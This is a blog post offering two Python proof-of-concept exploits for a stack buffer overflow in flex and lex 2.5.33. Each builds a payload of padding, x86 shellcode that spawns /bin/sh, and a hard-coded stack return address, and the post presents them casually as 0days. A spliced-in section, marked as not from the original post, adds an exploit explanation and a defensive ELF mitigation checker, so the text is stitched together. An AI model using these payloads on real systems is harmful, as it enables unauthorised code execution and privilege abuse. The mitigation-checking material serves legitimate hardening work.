Tuesday 28 April 2015

[EN] Flex 2.5.33 (2) 0days

I was testing some old bugs in one old distro, and that's how I found a SIGSEGV in flex (2.5.33).

Below is the proof of concept:

---
#!/usr/bin/env python
# -------------------------
# 0day poc for flex 2.5.33
#

from subprocess import call

flex = '/usr/bin/flex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*2165
ret = "\xc0\xfb\xff\xbf"

payload = nops + shellcode + ret
call([flex,payload])

print 'Done\n\n'
---


The second one is pretty similar (this time for the /usr/bin/lex binary):

---
#!/usr/bin/env python
# -------------------------
# 0day poc for lex 2.5.33
# 28.04.2015
#

from subprocess import call

lex = '/usr/bin/lex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "\x90"*2165
ret = "\x80\xfb\xff\xbf"

payload = nops + shellcode + ret
call([lex,payload])

print 'Done\n\n'
---
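Both PoCs follow the same pattern: the oversized argument ends up on the stack, so the payload carries its own shellcode and overwrites the saved return address with a fixed stack address (`\xc0\xfb\xff\xbf` is 0xbffffbc0 little-endian, `\x80\xfb\xff\xbf` is 0xbffffb80). That only works when the stack is executable and addresses are not randomized, which is why this kind of crash is mostly a reliability problem on a hardened system and a code-execution problem on an old distro. The script below is an added example (not from the original post) that reads the ELF header and program headers of a binary and reports the binary-side mitigations that matter here: an executable stack (`PT_GNU_STACK` without `PF_X`), PIE (`e_type == ET_DYN`, needed for ASLR to move the executable itself) and RELRO. It treats a missing `PT_GNU_STACK` as executable, the conservative reading. The `build_sample_elf32` helper is a constructed, non-runnable ELF image used only to exercise the parser offline; the system-wide ASLR switch lives in `/proc/sys/kernel/randomize_va_space` and is not something an ELF file can tell you.

```python
#!/usr/bin/env python3
# Added example: minimal ELF mitigation check (executable stack, PIE, RELRO).
# Hypothetical helper, not part of flex or of the original post.
import struct
import sys

PT_GNU_STACK = 0x6474E551   # p_type: stack permissions requested by the toolchain
PT_GNU_RELRO = 0x6474E552   # p_type: region made read-only after relocation
PF_X = 0x1                  # executable bit in p_flags
ET_DYN = 3                  # e_type of shared objects and PIE executables


def elf_mitigations(data):
    """Parse the ELF header and program headers in `data` (bytes) and return
    {"exec_stack": bool, "pie": bool, "relro": bool}. Raises ValueError on
    non-ELF input. Handles ELF32/ELF64 and both byte orders."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    endian = "<" if data[5] == 1 else ">"
    if is64:
        # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
        # e_ehsize, e_phentsize, e_phnum
        fields = struct.unpack_from(endian + "HHIQQQIHHH", data, 16)
    else:
        fields = struct.unpack_from(endian + "HHIIIIIHHH", data, 16)
    e_type, e_phoff, e_phentsize, e_phnum = fields[0], fields[4], fields[8], fields[9]

    exec_stack = True   # no PT_GNU_STACK at all: assume the old executable default
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            # Elf64_Phdr: p_type, p_flags, p_offset, ...
            p_type, p_flags = struct.unpack_from(endian + "II", data, off)
        else:
            # Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz,
            # p_memsz, p_flags, p_align -> p_flags sits at byte 24
            p_type = struct.unpack_from(endian + "I", data, off)[0]
            p_flags = struct.unpack_from(endian + "I", data, off + 24)[0]
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"exec_stack": exec_stack, "pie": e_type == ET_DYN, "relro": relro}


def build_sample_elf32(stack_flags, e_type=2):
    """Constructed sample: a 52-byte ELF32 little-endian header followed by a
    single PT_GNU_STACK program header. Not loadable; only for testing the
    parser without touching a real binary."""
    ehsize, phentsize = 52, 32
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELF32, LE, v1
    header = ident + struct.pack(
        "<HHIIIIIHHHHHH",
        e_type, 3, 1, 0,          # e_type, EM_386, e_version, e_entry
        ehsize, 0, 0,             # e_phoff (right after header), e_shoff, e_flags
        ehsize, phentsize, 1,     # e_ehsize, e_phentsize, e_phnum
        0, 0, 0)                  # e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return header + phdr


def describe(result):
    """Human-readable verdict for one binary."""
    return "stack: {}, PIE: {}, RELRO: {}".format(
        "executable" if result["exec_stack"] else "non-executable",
        "yes" if result["pie"] else "no",
        "yes" if result["relro"] else "no")


if __name__ == "__main__":
    # Usage: elfcheck.py /usr/bin/flex  (path is whatever you want to inspect)
    if len(sys.argv) != 2:
        print("usage: {} <elf-file>".format(sys.argv[0]))
        sys.exit(2)
    with open(sys.argv[1], "rb") as f:
        print(sys.argv[1] + ": " + describe(elf_mitigations(f.read())))
```

On a binary that reports a non-executable stack and PIE, a payload like the ones above cannot both execute from the argument buffer and guess a fixed return address, so the same SIGSEGV stays a denial-of-service bug rather than code execution; that is the difference the distro's build flags make, independent of the flex fix itself.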


Enjoy ;)


o/
